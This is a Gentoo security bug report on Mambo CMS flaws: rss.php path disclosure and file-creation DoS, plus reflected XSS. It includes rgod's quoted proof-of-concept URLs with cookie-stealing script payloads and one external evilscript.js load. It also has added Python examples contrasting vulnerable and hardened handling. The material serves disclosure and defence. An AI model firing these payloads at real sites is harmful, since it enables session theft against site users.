
Bug 130584

Summary: www-apps/mambo - unvalidated user input in rss component (CVE-2006-195{6|7})
Product: Gentoo Security
Reporter: Carsten Lohrke (RETIRED) <carlo>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: trivial
CC: web-apps
Priority: High
Version: unspecified
Hardware: All
OS: Linux
Whiteboard: ~3 [noglsa]
Package list:
Runtime testing required: ---

Description Carsten Lohrke (RETIRED) gentoo-dev 2006-04-20 03:48:45 UTC
The script does not properly validate user-supplied input in rss.php. A remote user can supply a specially crafted URL to cause the system to display an error message that discloses the installation path, or force the script to create tons of superfluous XML files, which in some cases results in remote DoS attacks against the target.


http://www.kapda.ir/advisory-313.html
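The bug class in the description above, modelled as an added Python example (this is not Mambo's PHP code and not code from the KAPDA advisory): a feed name taken straight from the request is used to name a cache file, so every distinct value an attacker sends creates another XML file, and the failure path echoes the absolute filesystem path. The `feed` parameter name, the cache layout and the allow-list of feed names are assumptions made for the illustration; the hardened variant allow-lists the name before any path is built and keeps error text generic.

```python
"""Added example, not Mambo's code: models the rss.php bug class described in
this bug (unvalidated input used to name cache files, error text leaking the
install path). Parameter name, cache layout and feed names are assumptions."""
import os
import tempfile

# Assumed: the feed formats the script legitimately knows how to generate.
ALLOWED_FEEDS = ("RSS0.91", "RSS1.0", "RSS2.0", "ATOM")

STUB_FEED = '<rss version="2.0"></rss>'


def rss_vulnerable(cache_dir: str, feed: str) -> str:
    """Any ?feed= value becomes <cache_dir>/<feed>.xml; failures leak the path."""
    path = os.path.join(cache_dir, feed + ".xml")
    try:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(STUB_FEED)
    except OSError as exc:
        # Installation path disclosure: the absolute path is part of the message.
        return f"Error: unable to write {path} ({exc.strerror})"
    return "ok"


def rss_hardened(cache_dir: str, feed: str) -> str:
    """Allow-list the feed name before touching the filesystem; keep errors generic."""
    if feed not in ALLOWED_FEEDS:
        return "Error: unknown feed"
    path = os.path.join(cache_dir, feed + ".xml")   # only allow-listed names reach here
    try:
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(STUB_FEED)
    except OSError:
        return "Error: feed temporarily unavailable"  # no path in the message
    return "ok"


def cache_file_count(cache_dir: str) -> int:
    """Number of .xml cache files currently on disk."""
    return sum(1 for name in os.listdir(cache_dir) if name.endswith(".xml"))


def demo() -> dict:
    """Replay constructed attacker requests (?feed=junk0 ... junk199, then a
    value containing path separators) against both handlers in scratch dirs."""
    results = {}
    with tempfile.TemporaryDirectory() as cache_dir:
        for i in range(200):
            rss_vulnerable(cache_dir, f"junk{i}")
        results["vuln_files"] = cache_file_count(cache_dir)        # 200 junk files
        results["vuln_error"] = rss_vulnerable(cache_dir, "no/such/dir/x")
    with tempfile.TemporaryDirectory() as cache_dir:
        for i in range(200):
            rss_hardened(cache_dir, f"junk{i}")
        results["hard_files"] = cache_file_count(cache_dir)        # 0
        results["hard_error"] = rss_hardened(cache_dir, "no/such/dir/x")
        results["hard_ok"] = rss_hardened(cache_dir, "RSS2.0")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The allow-list check sits before `os.path.join`, so the hardened handler never derives a filesystem path from raw input at all; that is what bounds the number of cache files to the size of the allow-list regardless of how many crafted URLs arrive.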
Comment 1 Carsten Lohrke (RETIRED) gentoo-dev 2006-04-20 05:16:41 UTC
Apparently this has been fixed in Joomla 1.0.8 (bug 124082), but not in Mambo.
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2006-04-21 09:57:39 UTC
web-apps: not sure there is a fix published for this ?
Comment 3 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-05-25 06:56:39 UTC
Hi,

An XSS vuln has also been reported by rgod (http://archives.neohapsis.com/archives/bugtraq/2006-05/0491.html)

I don't file a new bug because AFAIK this XSS vuln is still in [upstream] status, the gravity is minor (~4), and the ebuild is ~arched.


Mambo <= 4.6. RC1 Cross Site Scripting

---------------------------------------

http://[target]/[path_to_mambo]/administrator/popups/index3pop.php?mosConfig_sitename=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/popupImage.php?img_title=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?cur_colour=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?func=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/colorpicker.php?block=--%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?image_src=http://location/evilscript.js
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?img_title=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

---------------------------------------
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
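The two reflection contexts in rgod's PoC URLs above, as an added Python example (not Mambo's code and not part of rgod's advisory): the `mosConfig_sitename` value lands inside `<title>`, where the payload closes the title and opens a script, and the `colorpicker.php` values land inside an inline `<script>` block, where the payload closes the HTML comment and the script element before opening its own. The payloads are the URL-decoded strings from the advisory; the page template shapes and the JavaScript variable name are assumptions. Each vulnerable renderer is shown beside a version using the escaping that fits its context, and a small counter shows how many `<script` tags the resulting markup exposes.

```python
"""Added example, not Mambo's code: context-specific escaping for the two
reflection points in rgod's PoC URLs. Template shapes and the JS variable
name are assumptions; the payloads are the advisory's, URL-decoded."""
import html
import json

TITLE_PAYLOAD = "</title><script>alert(document.cookie)</script>"
SCRIPT_PAYLOAD = "--></script></head><body><script>alert(document.cookie)</script>"


def render_title_vulnerable(sitename: str) -> str:
    """Mirrors index3pop.php?mosConfig_sitename=...: raw value inside <title>."""
    return f"<html><head><title>{sitename}</title></head><body></body></html>"


def render_title_safe(sitename: str) -> str:
    """HTML text context: entity-encode <, >, & and quotes."""
    safe = html.escape(sitename, quote=True)
    return f"<html><head><title>{safe}</title></head><body></body></html>"


def render_colorpicker_vulnerable(cur_colour: str) -> str:
    """Mirrors colorpicker.php?cur_colour=...: value dropped into a JS string
    literal inside a <script><!-- ... //--></script> block (assumed shape)."""
    return ("<html><head><script><!--\n"
            f"var cur_colour = '{cur_colour}';\n"
            "//--></script></head><body></body></html>")


def js_string_literal(value: str) -> str:
    """JavaScript string context: emit a JSON string literal and replace the
    characters the HTML tokenizer cares about (<, >, &) with \\uXXXX escapes,
    so neither </script> nor <!-- can appear in the script body."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_colorpicker_safe(cur_colour: str) -> str:
    return ("<html><head><script><!--\n"
            f"var cur_colour = {js_string_literal(cur_colour)};\n"
            "//--></script></head><body></body></html>")


def count_script_tags(page: str) -> int:
    """Number of '<script' opening tags present in the markup."""
    return page.lower().count("<script")


if __name__ == "__main__":
    for label, page in [
        ("title, vulnerable", render_title_vulnerable(TITLE_PAYLOAD)),
        ("title, safe", render_title_safe(TITLE_PAYLOAD)),
        ("colorpicker, vulnerable", render_colorpicker_vulnerable(SCRIPT_PAYLOAD)),
        ("colorpicker, safe", render_colorpicker_safe(SCRIPT_PAYLOAD)),
    ]:
        print(f"{label}: {count_script_tags(page)} <script tag(s)")
```

The point of the two safe renderers is that the escaping is chosen per context: `html.escape` is right for element text such as `<title>`, but would be wrong inside a script block, where a JSON string literal with `<` escaped to `\u003c` is what keeps the HTML tokenizer from ever seeing a closing `</script>`.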
Comment 4 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-05-25 06:57:24 UTC
Concerning the RSS vuln, it's CVE-2006-1956 and CVE-2006-1957
Comment 5 Stuart Herbert (RETIRED) gentoo-dev 2006-05-31 00:31:21 UTC
UPSTREAM have released Mambo 4.5.4 day before yesterday.  I'll snag a copy, and see if it addresses these problems.

Best regards,
Stu
Comment 6 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-06-11 13:39:01 UTC
(In reply to comment #5)
> UPSTREAM have released Mambo 4.5.4 day before yesterday.  I'll snag a copy, and
> see if it addresses these problems.
> 

Hi Stuart, your conclusion?
Comment 7 Renat Lumpau (RETIRED) gentoo-dev 2006-06-17 17:35:33 UTC
4.5.4 is in the tree, 4.5.3h removed. From the changelog:

5. Patched a low risk RSS vulnerability
Comment 8 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2006-06-22 11:22:01 UTC
Thx Renat. Closing with no GLSA.